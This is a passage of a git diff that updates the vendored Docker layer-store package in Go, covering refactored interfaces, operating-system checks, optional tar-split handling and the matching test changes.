-	CreateRWLayer(id string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error)
+	CreateRWLayer(id string, parent ChainID, opts *CreateRWLayerOpts) (RWLayer, error)
 	GetRWLayer(id string) (RWLayer, error)
 	GetMountID(id string) (string, error)
 	ReleaseRWLayer(RWLayer) ([]Metadata, error)
@@ -193,52 +201,6 @@ type DescribableStore interface {
 	RegisterWithDescriptor(io.Reader, ChainID, distribution.Descriptor) (Layer, error)
 }
 
-// MetadataTransaction represents functions for setting layer metadata
-// with a single transaction.
-type MetadataTransaction interface {
-	SetSize(int64) error
-	SetParent(parent ChainID) error
-	SetDiffID(DiffID) error
-	SetCacheID(string) error
-	SetDescriptor(distribution.Descriptor) error
-	TarSplitWriter(compressInput bool) (io.WriteCloser, error)
-
-	Commit(ChainID) error
-	Cancel() error
-	String() string
-}
-
-// MetadataStore represents a backend for persisting
-// metadata about layers and providing the metadata
-// for restoring a Store.
-type MetadataStore interface {
-	// StartTransaction starts an update for new metadata
-	// which will be used to represent an ID on commit.
-	StartTransaction() (MetadataTransaction, error)
-
-	GetSize(ChainID) (int64, error)
-	GetParent(ChainID) (ChainID, error)
-	GetDiffID(ChainID) (DiffID, error)
-	GetCacheID(ChainID) (string, error)
-	GetDescriptor(ChainID) (distribution.Descriptor, error)
-	TarSplitReader(ChainID) (io.ReadCloser, error)
-
-	SetMountID(string, string) error
-	SetInitID(string, string) error
-	SetMountParent(string, ChainID) error
-
-	GetMountID(string) (string, error)
-	GetInitID(string) (string, error)
-	GetMountParent(string) (ChainID, error)
-
-	// List returns the full list of referenced
-	// read-only and read-write layers
-	List() ([]ChainID, []string, error)
-
-	Remove(ChainID) error
-	RemoveMount(string) error
-}
-
 // CreateChainID returns ID for a layerDigest slice
 func CreateChainID(dgsts []DiffID) ChainID {
 	return createChainIDFromParent("", dgsts...)
diff --git a/vendor/github.com/docker/docker/layer/layer_store.go b/vendor/github.com/docker/docker/layer/layer_store.go
index 1a1ff9fe59..c1fbf85091 100644
--- a/vendor/github.com/docker/docker/layer/layer_store.go
+++ b/vendor/github.com/docker/docker/layer/layer_store.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"errors"
@@ -7,13 +7,14 @@ import (
 	"io/ioutil"
 	"sync"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/distribution"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/plugingetter"
 	"github.com/docker/docker/pkg/stringid"
+	"github.com/docker/docker/pkg/system"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 	"github.com/vbatts/tar-split/tar/asm"
 	"github.com/vbatts/tar-split/tar/storage"
 )
@@ -26,62 +27,76 @@ import (
 const maxLayerDepth = 125
 
 type layerStore struct {
-	store  MetadataStore
-	driver graphdriver.Driver
+	store       *fileMetadataStore
+	driver      graphdriver.Driver
+	useTarSplit bool
 
 	layerMap map[ChainID]*roLayer
 	layerL   sync.Mutex
 
 	mounts map[string]*mountedLayer
 	mountL sync.Mutex
+	os     string
 }
 
 // StoreOptions are the options used to create a new Store instance
 type StoreOptions struct {
-	StorePath                 string
+	Root                      string
 	MetadataStorePathTemplate string
 	GraphDriver               string
 	GraphDriverOptions        []string
-	UIDMaps                   []idtools.IDMap
-	GIDMaps                   []idtools.IDMap
+	IDMappings                *idtools.IDMappings
 	PluginGetter              plugingetter.PluginGetter
 	ExperimentalEnabled       bool
+	OS                        string
 }
 
 // NewStoreFromOptions creates a new Store instance
 func NewStoreFromOptions(options StoreOptions) (Store, error) {
 	driver, err := graphdriver.New(options.GraphDriver, options.PluginGetter, graphdriver.Options{
-		Root:                options.StorePath,
+		Root:                options.Root,
 		DriverOptions:       options.GraphDriverOptions,
-		UIDMaps:             options.UIDMaps,
-		GIDMaps:             options.GIDMaps,
+		UIDMaps:             options.IDMappings.UIDs(),
+		GIDMaps:             options.IDMappings.GIDs(),
 		ExperimentalEnabled: options.ExperimentalEnabled,
 	})
 	if err != nil {
 		return nil, fmt.Errorf("error initializing graphdriver: %v", err)
 	}
-	logrus.Debugf("Using graph driver %s", driver)
+	logrus.Debugf("Initialized graph driver %s", driver)
 
-	fms, err := NewFSMetadataStore(fmt.Sprintf(options.MetadataStorePathTemplate, driver))
-	if err != nil {
-		return nil, err
-	}
+	root := fmt.Sprintf(options.MetadataStorePathTemplate, driver)
 
-	return NewStoreFromGraphDriver(fms, driver)
+	return newStoreFromGraphDriver(root, driver, options.OS)
 }
 
-// NewStoreFromGraphDriver creates a new Store instance using the provided
+// newStoreFromGraphDriver creates a new Store instance using the provided
 // metadata store and graph driver. The metadata store will be used to restore
 // the Store.
-func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (Store, error) {
+func newStoreFromGraphDriver(root string, driver graphdriver.Driver, os string) (Store, error) {
+	if !system.IsOSSupported(os) {
+		return nil, fmt.Errorf("failed to initialize layer store as operating system '%s' is not supported", os)
+	}
+	caps := graphdriver.Capabilities{}
+	if capDriver, ok := driver.(graphdriver.CapabilityDriver); ok {
+		caps = capDriver.Capabilities()
+	}
+
+	ms, err := newFSMetadataStore(root)
+	if err != nil {
+		return nil, err
+	}
+
 	ls := &layerStore{
-		store:    store,
-		driver:   driver,
-		layerMap: map[ChainID]*roLayer{},
-		mounts:   map[string]*mountedLayer{},
+		store:       ms,
+		driver:      driver,
+		layerMap:    map[ChainID]*roLayer{},
+		mounts:      map[string]*mountedLayer{},
+		useTarSplit: !caps.ReproducesExactDiffs,
+		os:          os,
 	}
 
-	ids, mounts, err := store.List()
+	ids, mounts, err := ms.List()
 	if err != nil {
 		return nil, err
 	}
@@ -106,6 +121,10 @@ func NewStoreFromGraphDriver(store MetadataStore, driver graphdriver.Driver) (St
 	return ls, nil
 }
 
+func (ls *layerStore) Driver() graphdriver.Driver {
+	return ls.driver
+}
+
 func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) {
 	cl, ok := ls.layerMap[layer]
 	if ok {
@@ -137,6 +156,15 @@ func (ls *layerStore) loadLayer(layer ChainID) (*roLayer, error) {
 		return nil, fmt.Errorf("failed to get descriptor for %s: %s", layer, err)
 	}
 
+	os, err := ls.store.getOS(layer)
+	if err != nil {
+		return nil, fmt.Errorf("failed to get operating system for %s: %s", layer, err)
+	}
+
+	if os != ls.os {
+		return nil, fmt.Errorf("failed to load layer with os %s into layerstore for %s", os, ls.os)
+	}
+
 	cl = &roLayer{
 		chainID:    layer,
 		diffID:     diff,
@@ -203,22 +231,25 @@ func (ls *layerStore) loadMount(mount string) error {
 	return nil
 }
 
-func (ls *layerStore) applyTar(tx MetadataTransaction, ts io.Reader, parent string, layer *roLayer) error {
-	digester := digest.Canonical.New()
+func (ls *layerStore) applyTar(tx *fileMetadataTransaction, ts io.Reader, parent string, layer *roLayer) error {
+	digester := digest.Canonical.Digester()
 	tr := io.TeeReader(ts, digester.Hash())
 
-	tsw, err := tx.TarSplitWriter(true)
-	if err != nil {
-		return err
-	}
-	metaPacker := storage.NewJSONPacker(tsw)
-	defer tsw.Close()
+	rdr := tr
+	if ls.useTarSplit {
+		tsw, err := tx.TarSplitWriter(true)
+		if err != nil {
+			return err
+		}
+		metaPacker := storage.NewJSONPacker(tsw)
+		defer tsw.Close()
 
-	// we're passing nil here for the file putter, because the ApplyDiff will
-	// handle the extraction of the archive
-	rdr, err := asm.NewInputTarStream(tr, metaPacker, nil)
-	if err != nil {
-		return err
+		// we're passing nil here for the file putter, because the ApplyDiff will
+		// handle the extraction of the archive
+		rdr, err = asm.NewInputTarStream(tr, metaPacker, nil)
+		if err != nil {
+			return err
+		}
 	}
 
 	applySize, err := ls.driver.ApplyDiff(layer.cacheID, parent, rdr)
@@ -248,6 +279,7 @@ func (ls *layerStore) registerWithDescriptor(ts io.Reader, parent ChainID, descr
 	var err error
 	var pid string
 	var p *roLayer
+
 	if string(parent) != "" {
 		p = ls.get(parent)
 		if p == nil {
@@ -378,7 +410,6 @@ func (ls *layerStore) deleteLayer(layer *roLayer, metadata *Metadata) error {
 	if err != nil {
 		return err
 	}
-
 	err = ls.store.Remove(layer.chainID)
 	if err != nil {
 		return err
@@ -445,7 +476,19 @@ func (ls *layerStore) Release(l Layer) ([]Metadata, error) {
 	return ls.releaseLayer(layer)
 }
 
-func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel string, initFunc MountInit, storageOpt map[string]string) (RWLayer, error) {
+func (ls *layerStore) CreateRWLayer(name string, parent ChainID, opts *CreateRWLayerOpts) (RWLayer, error) {
+	var (
+		storageOpt map[string]string
+		initFunc   MountInit
+		mountLabel string
+	)
+
+	if opts != nil {
+		mountLabel = opts.MountLabel
+		storageOpt = opts.StorageOpt
+		initFunc = opts.InitFunc
+	}
+
 	ls.mountL.Lock()
 	defer ls.mountL.Unlock()
 	m, ok := ls.mounts[name]
@@ -496,7 +539,6 @@ func (ls *layerStore) CreateRWLayer(name string, parent ChainID, mountLabel stri
 	if err = ls.driver.CreateReadWrite(m.mountID, pid, createOpts); err != nil {
 		return nil, err
 	}
-
 	if err = ls.saveMount(m); err != nil {
 		return nil, err
 	}
@@ -628,6 +670,34 @@ func (ls *layerStore) initMount(graphID, parent, mountLabel string, initFunc Mou
 	return initID, nil
 }
 
+func (ls *layerStore) getTarStream(rl *roLayer) (io.ReadCloser, error) {
+	if !ls.useTarSplit {
+		var parentCacheID string
+		if rl.parent != nil {
+			parentCacheID = rl.parent.cacheID
+		}
+
+		return ls.driver.Diff(rl.cacheID, parentCacheID)
+	}
+
+	r, err := ls.store.TarSplitReader(rl.chainID)
+	if err != nil {
+		return nil, err
+	}
+
+	pr, pw := io.Pipe()
+	go func() {
+		err := ls.assembleTarTo(rl.cacheID, r, nil, pw)
+		if err != nil {
+			pw.CloseWithError(err)
+		} else {
+			pw.Close()
+		}
+	}()
+
+	return pr, nil
+}
+
 func (ls *layerStore) assembleTarTo(graphID string, metadata io.ReadCloser, size *int64, w io.Writer) error {
 	diffDriver, ok := ls.driver.(graphdriver.DiffGetterDriver)
 	if !ok {
@@ -680,5 +750,5 @@ func (n *naiveDiffPathDriver) DiffGetter(id string) (graphdriver.FileGetCloser,
 	if err != nil {
 		return nil, err
 	}
-	return &fileGetPutter{storage.NewPathFileGetter(p), n.Driver, id}, nil
+	return &fileGetPutter{storage.NewPathFileGetter(p.Path()), n.Driver, id}, nil
 }
diff --git a/vendor/github.com/docker/docker/layer/layer_store_windows.go b/vendor/github.com/docker/docker/layer/layer_store_windows.go
index 1276a912cc..eca1f6a83b 100644
--- a/vendor/github.com/docker/docker/layer/layer_store_windows.go
+++ b/vendor/github.com/docker/docker/layer/layer_store_windows.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/layer/layer_test.go b/vendor/github.com/docker/docker/layer/layer_test.go
index 10712df998..5c4e8fab19 100644
--- a/vendor/github.com/docker/docker/layer/layer_test.go
+++ b/vendor/github.com/docker/docker/layer/layer_test.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"bytes"
@@ -10,17 +10,20 @@ import (
 	"strings"
 	"testing"
 
-	"github.com/docker/distribution/digest"
+	"github.com/containerd/continuity/driver"
 	"github.com/docker/docker/daemon/graphdriver"
 	"github.com/docker/docker/daemon/graphdriver/vfs"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
 	"github.com/docker/docker/pkg/idtools"
 	"github.com/docker/docker/pkg/stringid"
+	"github.com/opencontainers/go-digest"
 )
 
 func init() {
 	graphdriver.ApplyUncompressedLayer = archive.UnpackLayer
-	vfs.CopyWithTar = archive.CopyWithTar
+	defaultArchiver := archive.NewDefaultArchiver()
+	vfs.CopyDir = defaultArchiver.CopyWithTar
 }
 
 func newVFSGraphDriver(td string) (graphdriver.Driver, error) {
@@ -66,11 +69,8 @@ func newTestStore(t *testing.T) (Store, string, func()) {
 	}
 
 	graph, graphcleanup := newTestGraphDriver(t)
-	fms, err := NewFSMetadataStore(td)
-	if err != nil {
-		t.Fatal(err)
-	}
-	ls, err := NewStoreFromGraphDriver(fms, graph)
+
+	ls, err := newStoreFromGraphDriver(td, graph, runtime.GOOS)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -81,21 +81,21 @@ func newTestStore(t *testing.T) (Store, string, func()) {
 	}
 }
 
-type layerInit func(root string) error
+type layerInit func(root containerfs.ContainerFS) error
 
 func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) {
 	containerID := stringid.GenerateRandomID()
-	mount, err := ls.CreateRWLayer(containerID, parent, "", nil, nil)
+	mount, err := ls.CreateRWLayer(containerID, parent, nil)
 	if err != nil {
 		return nil, err
 	}
 
-	path, err := mount.Mount("")
+	pathFS, err := mount.Mount("")
 	if err != nil {
 		return nil, err
 	}
 
-	if err := layerFunc(path); err != nil {
+	if err := layerFunc(pathFS); err != nil {
 		return nil, err
 	}
 
@@ -122,7 +122,7 @@ func createLayer(ls Store, parent ChainID, layerFunc layerInit) (Layer, error) {
 }
 
 type FileApplier interface {
-	ApplyFile(root string) error
+	ApplyFile(root containerfs.ContainerFS) error
 }
 
 type testFile struct {
@@ -139,25 +139,22 @@ func newTestFile(name string, content []byte, perm os.FileMode) FileApplier {
 	}
 }
 
-func (tf *testFile) ApplyFile(root string) error {
-	fullPath := filepath.Join(root, tf.name)
-	if err := os.MkdirAll(filepath.Dir(fullPath), 0755); err != nil {
+func (tf *testFile) ApplyFile(root containerfs.ContainerFS) error {
+	fullPath := root.Join(root.Path(), tf.name)
+	if err := root.MkdirAll(root.Dir(fullPath), 0755); err != nil {
 		return err
 	}
 	// Check if already exists
-	if stat, err := os.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission {
-		if err := os.Chmod(fullPath, tf.permission); err != nil {
+	if stat, err := root.Stat(fullPath); err == nil && stat.Mode().Perm() != tf.permission {
+		if err := root.Lchmod(fullPath, tf.permission); err != nil {
 			return err
 		}
 	}
-	if err := ioutil.WriteFile(fullPath, tf.content, tf.permission); err != nil {
-		return err
-	}
-	return nil
+	return driver.WriteFile(root, fullPath, tf.content, tf.permission)
 }
 
 func initWithFiles(files ...FileApplier) layerInit {
-	return func(root string) error {
+	return func(root containerfs.ContainerFS) error {
 		for _, f := range files {
 			if err := f.ApplyFile(root); err != nil {
 				return err
@@ -231,7 +228,7 @@ func cacheID(l Layer) string {
 
 func assertLayerEqual(t *testing.T, l1, l2 Layer) {
 	if l1.ChainID() != l2.ChainID() {
-		t.Fatalf("Mismatched ID: %s vs %s", l1.ChainID(), l2.ChainID())
+		t.Fatalf("Mismatched ChainID: %s vs %s", l1.ChainID(), l2.ChainID())
 	}
 	if l1.DiffID() != l2.DiffID() {
 		t.Fatalf("Mismatched DiffID: %s vs %s", l1.DiffID(), l2.DiffID())
@@ -277,7 +274,7 @@ func TestMountAndRegister(t *testing.T) {
 	size, _ := layer.Size()
 	t.Logf("Layer size: %d", size)
 
-	mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), "", nil, nil)
+	mount2, err := ls.CreateRWLayer("new-test-mount", layer.ChainID(), nil)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -287,7 +284,7 @@ func TestMountAndRegister(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	b, err := ioutil.ReadFile(filepath.Join(path2, "testfile.txt"))
+	b, err := driver.ReadFile(path2, path2.Join(path2.Path(), "testfile.txt"))
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -385,17 +382,17 @@ func TestStoreRestore(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), "", nil, nil)
+	m, err := ls.CreateRWLayer("some-mount_name", layer3.ChainID(), nil)
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	path, err := m.Mount("")
+	pathFS, err := m.Mount("")
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	if err := ioutil.WriteFile(filepath.Join(path, "testfile.txt"), []byte("nothing here"), 0644); err != nil {
+	if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile.txt"), []byte("nothing here"), 0644); err != nil {
 		t.Fatal(err)
 	}
 
@@ -403,7 +400,7 @@ func TestStoreRestore(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	ls2, err := NewStoreFromGraphDriver(ls.(*layerStore).store, ls.(*layerStore).driver)
+	ls2, err := newStoreFromGraphDriver(ls.(*layerStore).store.root, ls.(*layerStore).driver, runtime.GOOS)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -416,7 +413,7 @@ func TestStoreRestore(t *testing.T) {
 	assertLayerEqual(t, layer3b, layer3)
 
 	// Create again with same name, should return error
-	if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), "", nil, nil); err == nil {
+	if _, err := ls2.CreateRWLayer("some-mount_name", layer3b.ChainID(), nil); err == nil {
 		t.Fatal("Expected error creating mount with same name")
 	} else if err != ErrMountNameConflict {
 		t.Fatal(err)
@@ -429,20 +426,20 @@ func TestStoreRestore(t *testing.T) {
 
 	if mountPath, err := m2.Mount(""); err != nil {
 		t.Fatal(err)
-	} else if path != mountPath {
-		t.Fatalf("Unexpected path %s, expected %s", mountPath, path)
+	} else if pathFS.Path() != mountPath.Path() {
+		t.Fatalf("Unexpected path %s, expected %s", mountPath.Path(), pathFS.Path())
 	}
 
 	if mountPath, err := m2.Mount(""); err != nil {
 		t.Fatal(err)
-	} else if path != mountPath {
-		t.Fatalf("Unexpected path %s, expected %s", mountPath, path)
+	} else if pathFS.Path() != mountPath.Path() {
+		t.Fatalf("Unexpected path %s, expected %s", mountPath.Path(), pathFS.Path())
 	}
 	if err := m2.Unmount(); err != nil {
 		t.Fatal(err)
 	}
 
-	b, err := ioutil.ReadFile(filepath.Join(path, "testfile.txt"))
+	b, err := driver.ReadFile(pathFS, pathFS.Join(pathFS.Path(), "testfile.txt"))
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -617,7 +614,7 @@ func tarFromFiles(files ...FileApplier) ([]byte, error) {
 	defer os.RemoveAll(td)
 
 	for _, f := range files {
-		if err := f.ApplyFile(td); err != nil {
+		if err := f.ApplyFile(containerfs.NewLocalContainerFS(td)); err != nil {
 			return nil, err
 		}
 	}
diff --git a/vendor/github.com/docker/docker/layer/layer_unix.go b/vendor/github.com/docker/docker/layer/layer_unix.go
index 776b78ac02..002c7ff838 100644
--- a/vendor/github.com/docker/docker/layer/layer_unix.go
+++ b/vendor/github.com/docker/docker/layer/layer_unix.go
@@ -1,6 +1,6 @@
-// +build linux freebsd darwin openbsd solaris
+// +build linux freebsd darwin openbsd
 
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import "github.com/docker/docker/pkg/stringid"
 
diff --git a/vendor/github.com/docker/docker/layer/layer_unix_test.go b/vendor/github.com/docker/docker/layer/layer_unix_test.go
index 9aa1afd597..6830158131 100644
--- a/vendor/github.com/docker/docker/layer/layer_unix_test.go
+++ b/vendor/github.com/docker/docker/layer/layer_unix_test.go
@@ -1,8 +1,10 @@
 // +build !windows
 
-package layer
+package layer // import "github.com/docker/docker/layer"
 
-import "testing"
+import (
+	"testing"
+)
 
 func graphDiffSize(ls Store, l Layer) (int64, error) {
 	cl := getCachedLayer(l)
diff --git a/vendor/github.com/docker/docker/layer/layer_windows.go b/vendor/github.com/docker/docker/layer/layer_windows.go
index e20311a091..25ef26afc1 100644
--- a/vendor/github.com/docker/docker/layer/layer_windows.go
+++ b/vendor/github.com/docker/docker/layer/layer_windows.go
@@ -1,14 +1,16 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"errors"
-	"fmt"
-
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
-	"github.com/docker/docker/daemon/graphdriver"
 )
 
+// Getter is an interface to get the path to a layer on the host.
+type Getter interface {
+	// GetLayerPath gets the path for the layer. This is different from Get()
+	// since that returns an interface to account for umountable layers.
+	GetLayerPath(id string) (string, error)
+}
+
 // GetLayerPath returns the path to a layer
 func GetLayerPath(s Store, layer ChainID) (string, error) {
 	ls, ok := s.(*layerStore)
@@ -23,6 +25,9 @@ func GetLayerPath(s Store, layer ChainID) (string, error) {
 		return "", ErrLayerDoesNotExist
 	}
 
+	if layerGetter, ok := ls.driver.(Getter); ok {
+		return layerGetter.GetLayerPath(rl.cacheID)
+	}
 	path, err := ls.driver.Get(rl.cacheID, "")
 	if err != nil {
 		return "", err
@@ -32,67 +37,10 @@ func GetLayerPath(s Store, layer ChainID) (string, error) {
 		return "", err
 	}
 
-	return path, nil
-}
-
-func (ls *layerStore) RegisterDiffID(graphID string, size int64) (Layer, error) {
-	var err error // this is used for cleanup in existingLayer case
-	diffID := digest.FromBytes([]byte(graphID))
-
-	// Create new roLayer
-	layer := &roLayer{
-		cacheID:        graphID,
-		diffID:         DiffID(diffID),
-		referenceCount: 1,
-		layerStore:     ls,
-		references:     map[Layer]struct{}{},
-		size:           size,
-	}
-
-	tx, err := ls.store.StartTransaction()
-	if err != nil {
-		return nil, err
-	}
-	defer func() {
-		if err != nil {
-			if err := tx.Cancel(); err != nil {
-				logrus.Errorf("Error canceling metadata transaction %q: %s", tx.String(), err)
-			}
-		}
-	}()
-
-	layer.chainID = createChainIDFromParent("", layer.diffID)
-
-	if !ls.driver.Exists(layer.cacheID) {
-		return nil, fmt.Errorf("layer %q is unknown to driver", layer.cacheID)
-	}
-	if err = storeLayer(tx, layer); err != nil {
-		return nil, err
-	}
-
-	ls.layerL.Lock()
-	defer ls.layerL.Unlock()
-
-	if existingLayer := ls.getWithoutLock(layer.chainID); existingLayer != nil {
-		// Set error for cleanup, but do not return
-		err = errors.New("layer already exists")
-		return existingLayer.getReference(), nil
-	}
-
-	if err = tx.Commit(layer.chainID); err != nil {
-		return nil, err
-	}
-
-	ls.layerMap[layer.chainID] = layer
-
-	return layer.getReference(), nil
+	return path.Path(), nil
 }
 
 func (ls *layerStore) mountID(name string) string {
 	// windows has issues if container ID doesn't match mount ID
 	return name
 }
-
-func (ls *layerStore) GraphDriver() graphdriver.Driver {
-	return ls.driver
-}
diff --git a/vendor/github.com/docker/docker/layer/migration.go b/vendor/github.com/docker/docker/layer/migration.go
index b45c31099d..2668ea96bb 100644
--- a/vendor/github.com/docker/docker/layer/migration.go
+++ b/vendor/github.com/docker/docker/layer/migration.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"compress/gzip"
@@ -7,8 +7,8 @@ import (
 	"io"
 	"os"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 	"github.com/vbatts/tar-split/tar/asm"
 	"github.com/vbatts/tar-split/tar/storage"
 )
@@ -16,7 +16,7 @@ import (
 // CreateRWLayerByGraphID creates a RWLayer in the layer store using
 // the provided name with the given graphID. To get the RWLayer
 // after migration the layer may be retrieved by the given name.
-func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent ChainID) (err error) {
+func (ls *layerStore) CreateRWLayerByGraphID(name, graphID string, parent ChainID) (err error) {
 	ls.mountL.Lock()
 	defer ls.mountL.Unlock()
 	m, ok := ls.mounts[name]
@@ -68,11 +68,7 @@ func (ls *layerStore) CreateRWLayerByGraphID(name string, graphID string, parent
 		m.initID = initID
 	}
 
-	if err = ls.saveMount(m); err != nil {
-		return err
-	}
-
-	return nil
+	return ls.saveMount(m)
 }
 
 func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID DiffID, size int64, err error) {
@@ -98,7 +94,7 @@ func (ls *layerStore) ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataP
 		return
 	}
 
-	dgst := digest.Canonical.New()
+	dgst := digest.Canonical.Digester()
 	err = ls.assembleTarTo(id, uncompressed, &size, dgst.Hash())
 	if err != nil {
 		return
diff --git a/vendor/github.com/docker/docker/layer/migration_test.go b/vendor/github.com/docker/docker/layer/migration_test.go
index 07b4b68f8f..923166371c 100644
--- a/vendor/github.com/docker/docker/layer/migration_test.go
+++ b/vendor/github.com/docker/docker/layer/migration_test.go
@@ -1,4 +1,4 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"bytes"
@@ -90,11 +90,8 @@ func TestLayerMigration(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	fms, err := NewFSMetadataStore(filepath.Join(td, "layers"))
-	if err != nil {
-		t.Fatal(err)
-	}
-	ls, err := NewStoreFromGraphDriver(fms, graph)
+	root := filepath.Join(td, "layers")
+	ls, err := newStoreFromGraphDriver(root, graph, runtime.GOOS)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -218,11 +215,8 @@ func TestLayerMigrationNoTarsplit(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	fms, err := NewFSMetadataStore(filepath.Join(td, "layers"))
-	if err != nil {
-		t.Fatal(err)
-	}
-	ls, err := NewStoreFromGraphDriver(fms, graph)
+	root := filepath.Join(td, "layers")
+	ls, err := newStoreFromGraphDriver(root, graph, runtime.GOOS)
 	if err != nil {
 		t.Fatal(err)
 	}
@@ -380,7 +374,7 @@ func TestMountMigration(t *testing.T) {
 		Kind: archive.ChangeAdd,
 	})
 
-	if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), "", nil, nil); err == nil {
+	if _, err := ls.CreateRWLayer("migration-mount", layer1.ChainID(), nil); err == nil {
 		t.Fatal("Expected error creating mount with same name")
 	} else if err != ErrMountNameConflict {
 		t.Fatal(err)
diff --git a/vendor/github.com/docker/docker/layer/mount_test.go b/vendor/github.com/docker/docker/layer/mount_test.go
index 7a8637eae9..1cfc370eed 100644
--- a/vendor/github.com/docker/docker/layer/mount_test.go
+++ b/vendor/github.com/docker/docker/layer/mount_test.go
@@ -1,14 +1,14 @@
-package layer
+package layer // import "github.com/docker/docker/layer"
 
 import (
 	"io/ioutil"
-	"os"
-	"path/filepath"
 	"runtime"
 	"sort"
 	"testing"
 
+	"github.com/containerd/continuity/driver"
 	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/containerfs"
 )
 
 func TestMountInit(t *testing.T) {
@@ -28,30 +28,33 @@ func TestMountInit(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	mountInit := func(root string) error {
+	mountInit := func(root containerfs.ContainerFS) error {
 		return initfile.ApplyFile(root)
 	}
 
-	m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), "", mountInit, nil)
+	rwLayerOpts := &CreateRWLayerOpts{
+		InitFunc: mountInit,
+	}
+	m, err := ls.CreateRWLayer("fun-mount", layer.ChainID(), rwLayerOpts)
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	path, err := m.Mount("")
+	pathFS, err := m.Mount("")
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	f, err := os.Open(filepath.Join(path, "testfile.txt"))
+	fi, err := pathFS.Stat(pathFS.Join(pathFS.Path(), "testfile.txt"))
 	if err != nil {
 		t.Fatal(err)
 	}
-	defer f.Close()
 
-	fi, err := f.Stat()
+	f, err := pathFS.Open(pathFS.Join(pathFS.Path(), "testfile.txt"))
 	if err != nil {
 		t.Fatal(err)
 	}
+	defer f.Close()
 
 	b, err := ioutil.ReadAll(f)
 	if err != nil {
@@ -85,21 +88,24 @@ func TestMountSize(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	mountInit := func(root string) error {
+	mountInit := func(root containerfs.ContainerFS) error {
 		return newTestFile("file-init", contentInit, 0777).ApplyFile(root)
 	}
+	rwLayerOpts := &CreateRWLayerOpts{
+		InitFunc: mountInit,
+	}
 
-	m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), "", mountInit, nil)
+	m, err := ls.CreateRWLayer("mount-size", layer.ChainID(), rwLayerOpts)
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	path, err := m.Mount("")
+	pathFS, err := m.Mount("")
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	if err := ioutil.WriteFile(filepath.Join(path, "file2"), content2, 0755); err != nil {
+	if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "file2"), content2, 0755); err != nil {
 		t.Fatal(err)
 	}
 
@@ -134,37 +140,40 @@ func TestMountChanges(t *testing.T) {
 		t.Fatal(err)
 	}
 
-	mountInit := func(root string) error {
+	mountInit := func(root containerfs.ContainerFS) error {
 		return initfile.ApplyFile(root)
 	}
+	rwLayerOpts := &CreateRWLayerOpts{
+		InitFunc: mountInit,
+	}
 
-	m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), "", mountInit, nil)
+	m, err := ls.CreateRWLayer("mount-changes", layer.ChainID(), rwLayerOpts)
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	path, err := m.Mount("")
+	pathFS, err := m.Mount("")
 	if err != nil {
 		t.Fatal(err)
 	}
 
-	if err := os.Chmod(filepath.Join(path, "testfile1.txt"), 0755); err != nil {
+	if err := pathFS.Lchmod(pathFS.Join(pathFS.Path(), "testfile1.txt"), 0755); err != nil {
 		t.Fatal(err)
 	}
 
-	if err := ioutil.WriteFile(filepath.Join(path, "testfile1.txt"), []byte("mount data!"), 0755); err != nil {
+	if err := driver.WriteFile(pathFS, pathFS.Join(pathFS.Path(), "testfile1.txt"), []byte("mount data!"), 0755); err != nil {
 		t.Fatal(err)
 	}
 
-	if err := os.Remove(filepath.Join(path, "testfile2.txt")); err != nil {
